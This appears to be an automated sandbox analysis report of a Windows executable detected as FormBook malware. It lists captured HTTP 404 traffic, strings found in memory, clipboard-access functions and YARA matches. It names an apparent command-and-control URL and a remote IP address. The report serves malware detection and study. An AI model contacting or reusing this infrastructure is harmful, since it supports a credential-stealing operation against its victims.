6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:31:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:31:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:33:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Fri, 03 May 2024 18:33:11 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:33:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:33:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:33:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72

Source: powershell.exe, 00000005.00000002.90776401624.000000006AAB7000.00000020.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://localhost/wsman:Microsoft.PowerShell.Workflow
Source: EsRWTuoxmxUO.exe, 0000000F.00000002.95006099037.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://n-benriya002.com/9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M
Source: 2024_04_005.exe, 00000003.00000002.90142442764.0000000000409000.00000002.00000001.01000000.00000004.sdmp, 2024_04_005.exe, 00000003.00000000.89939090190.0000000000409000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: powershell.exe, 00000005.00000002.90586974115.00000000048D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.90586974115.00000000048D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000005.00000002.90586974115.0000000004781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.90586974115.00000000048D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.90586974115.00000000048D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000005.00000002.90594014542.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000005.00000002.90724583852.0000000069982000.00000020.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.xmlspy.com)
Source: powershell.exe, 00000005.00000002.90838731563.000000006BFD2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.90586974115.0000000004781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBqq
Source: powershell.exe, 00000005.00000002.90586974115.00000000048D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.90586974115.00000000048D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52334
Source: unknown	Network traffic detected: HTTP traffic on port 52334 -> 443

Source: unknown

HTTPS traffic detected: 37.48.104.133:443 -> 192.168.11.20:52334 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\2024_04_005.exe

Code function: 3_2_00404B2B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

3_2_00404B2B

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.90700846265.0000000021170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.95003284580.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.95002883111.0000000001370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.95003804450.0000000003A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.95003597330.0000000006160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.94999869480.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

